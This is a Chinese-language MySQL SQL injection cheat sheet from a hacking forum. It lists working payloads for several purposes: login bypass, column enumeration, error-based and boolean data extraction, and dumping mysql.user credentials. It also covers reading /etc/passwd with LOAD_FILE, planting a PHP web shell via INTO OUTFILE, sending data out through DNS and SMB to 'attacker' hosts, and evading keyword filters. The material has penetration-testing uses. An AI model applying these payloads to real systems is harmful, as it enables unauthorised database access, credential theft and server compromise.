默认数据库
尝试注入
False表示查询无效(mysql语句错误/网页内容为空/与原页面不一致) True表示查询有效(网页内容与原先一致)
字符串型
漏洞语句: select * from table where id = ‘1’;
' | False | '' | True | " | False | "" | True | \ | False | \\ | True |
例子:
SELECT * FROMArticles WHERE id = '1'''; SELECT 1 FROM dualWHERE 1 = '1'''''''''''''UNION SELECT '2';
数字型漏洞语句: SELECT * FROM Table WHERE id = 1;
AND 1 True AND 0 False AND true True AND false False 1-false 如果有漏洞则返回1 1-true如果有漏洞则返回0 1*56 如果有漏洞则返回56 1*56 如果没漏洞则返回1
例子: SELECT * FROM UsersWHERE id = 3-2;
笔记:
true 等同于 1. false等同于 0.
登录口漏洞语句: SELECT * FROM Table WHERE username = '';
' OR '1 ' OR 1 -- - " OR "" = " " OR 1 = 1 -- - '=' 'LIKE' '=0--+
例子: SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';
注释查询以下内容可用于注释掉后面的其他语句 # /* -- - ;%00 `
例子:
SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password =''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';
获取版本VERSION() @@VERSION @@GLOBAL.VERSION
例子: SELECT * FROM Users WHERE id = '1' ANDMID(VERSION(),1,1) = '5';
内联注释
例子:
漏洞语句: SELECT * FROM Users limit 1,{INJECTION POINT};
/*!50094eaea*/; | False – 数据库版本大于等于 5.00.94 | /*!50096eaea*/; | True - 数据库版本小于5.00.96 | /*!50095eaea*/; | False - 数据库版本等于5.00.95 |
数据库凭证
Table | | | | | user(), current_user(), current_user, system_user(), session_user() |
例子:
SELECT current_user; SELECT CONCAT_WS(0x3A, user, password)FROM mysql.user WHERE user = 'root'-- (Privileged)
密码可以解密
数据库名称
Tables | information_schema.schemata, mysql.db | | | | |
例子: SELECT database(); SELECT schema_name FROM information_schema.schemata; SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)
数据库主机名
例子: SELECT @@hostname;
获取表和列确定列数通过group/orderGROUP/ORDER BY n+1; 笔记: 不断增加数字,直到页面错误
例子:
漏洞语句: SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}';
1' ORDER BY 1--+ True 1' ORDER BY 2--+ True 1' ORDER BY 3--+ True 1' ORDER BY 4--+ False -1' UNION SELECT 1,2,3--+ True 说明存在三列
通过报错(一)GROUP/ORDER BY 1,2,3,4,5...
例子: 漏洞语句: SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}' 1' GROUP BY 1,2,3,4,5--+ | Unknown column '4' in 'group statement' | 1' ORDER BY 1,2,3,4,5--+ | Unknown column '4' in 'order clause' |
通过报错(二)SELECT ... INTO var_list, var_list1, var_list2...
例子1: 漏洞语句: SELECTpermission FROM Users WHERE id = {INJECTION POINT}; -1 UNION SELECT 1 INTO @,@,@ | The used SELECT statements have a different number of columns | -1 UNION SELECT 1 INTO @,@ | The used SELECT statements have a different number of columns | -1 UNION SELECT 1 INTO @ | No error means query uses 1 column |
例子 2: 漏洞语句: SELECT username,permission FROM Users limit 1,{INJECTION POINT}; 1 INTO @,@,@ | The used SELECT statements have a different number of columns | 1 INTO @,@ | No error means query uses 2 columns |
通过报错(三)AND (SELECT * FROM SOME_EXISTING_TABLE) = 1 例子: 漏洞语句: SELECT permission FROMUsers WHERE id = {INJECTION POINT}; 1 AND (SELECT * FROM Users) = 1 | Operand should contain 3 column(s) |
检索表内容联合查询UNION SELECTGROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
布尔查询AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' |
报错查询AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) | (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); | AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));-- Available in 5.1.5 |
检索列内容联合查询UNION SELECT GROUP_CONCAT(column_name) FROMinformation_schema.columns WHERE table_name = 'tablename'
布尔查询
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' |
报错查询
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) | (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); | AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5 | AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1 | AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a) | AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a) |
limit注入漏洞语句: SELECT username, permission FROM Users WHEREid = 1; 1 PROCEDURE ANALYSE() | Get the first column's name | 1 LIMIT 1,1 PROCEDURE ANALYSE() | Get the second column's name | 1 LIMIT 2,1 PROCEDURE ANALYSE() | Get the third column's name |
一次检索多个表/列o SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM(information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x
SELECT * FROM Users WHERE id = '-1' UNION SELECT1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@)FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN(@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4--+';
输出为 [ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME [ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME [ information_schema ] >CHARACTER_SETS >DESCRIPTION [ information_schema ] >CHARACTER_SETS >MAXLEN [ information_schema ] >COLLATIONS >COLLATION_NAME [ information_schema ] >COLLATIONS >CHARACTER_SET_NAME [ information_schema ] >COLLATIONS > ID [ information_schema ] >COLLATIONS >IS_DEFAULT [ information_schema ] >COLLATIONS >IS_COMPILED
SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name,0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROMinformation_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROMinformation_schema.columns
SELECT username FROM Users WHERE id = '-1' UNIONSELECT MID(GROUP_CONCAT(0x3c62723e,0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDERBY (SELECT version FROM information_schema.tables) SEPARATOR0x3c62723e),1,1024) FROM information_schema.columns--+';
输出为 Table: talk_revisions Column: revid Table: talk_revisions Column: userid Table: talk_revisions Column: user Table: talk_projects Column: priority
从系统列查询信息SELECT table_name FROM information_schema.columnsWHERE column_name = 'username';
SELECT table_name FROM information_schema.columnsWHERE column_name LIKE '%user%';
SELECT column_name FROMinformation_schema.columns WHERE table_name = 'Users';
SELECT column_name FROMinformation_schema.columns WHERE table_name LIKE '%user%';
不使用单引号SELECT * FROM Users WHERE username = 0x61646D696E
SELECT * FROM Users WHERE username = CHAR(97,100, 109, 105, 110) 字符串连接
SELECT 'a' 'd' 'mi' 'n'; SELECT CONCAT('a', 'd', 'm', 'i', 'n'); SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n'); SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
条件语句
SELECT IF(1=1, true, false); SELECT CASE WHEN 1=1 THEN true ELSE false END;
时间判断
' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
权限判断确定哪个用户具有file权限 ELECT file_priv FROM mysql.user WHERE user = 'username'; | | | SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'; | | |
文件读取
具有file权限的用户可以读取文件 LOAD_FILE() SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE(0x2F6574632F706173737764);
写文件具有file权限的用户可以写文件
INTOOUTFILE/DUMPFILE
SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'; http://localhost/shell.php?c=cat%20/etc/passwd
SELECT '<? fwrite(fopen($_GET[f], \'w\'),file_get_contents($_GET)); ?>' INTO OUTFILE '/var/www/get.php'
http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt 数据带外DNSSELECT LOAD_FILE(CONCAT('\\\\foo.',(selectMID(version(),1,1)),'.attacker.com\\'));
SMB' OR 1=1 INTO OUTFILE'\\\\attacker\\SMBshare\\output.txt 多语句执行SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTOUsers(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin'); SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROMUsers;
内联查询MySQL允许在感叹号后指定版本号。仅当版本大于或等于指定的版本号时,才执行注释中的语法。
UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null--x*/0,null--+ SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);
混淆以下字符可以代替空格
'%0A%09UNION%0CSELECT%A0NULL%20%23
括号也可以用来避免使用空格UNION(SELECT(column)FROM(table))
and/or之后可以使用的符号SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
利用注释+换行1'#
AND 0--
UNION# Iam a comment!
SELECT@tmp--
`information_schema`.tables LIMIT 1#
1'%23%0AAND 0--%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tablesLIMIT 1%23
VERSION/**/%A0 (/*comment*/)
URL Encoding | SELECT %74able_%6eame FROM information_schema.tables; | | SELECT %2574able_%256eame FROM information_schema.tables; | | SELECT %u0074able_%u6eame FROM information_schema.tables; | Invalid Hex Encoding (ASP) | SELECT %tab%le_%na%me FROM information_schema.tables; |
逃避某些关键字空格 | information_schema . tables | | `information_schema`.`tables` | | /*!information_schema.tables*/ | | information_schema.partitions
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints |
条件比较
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2019-11-6 20:07:45
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡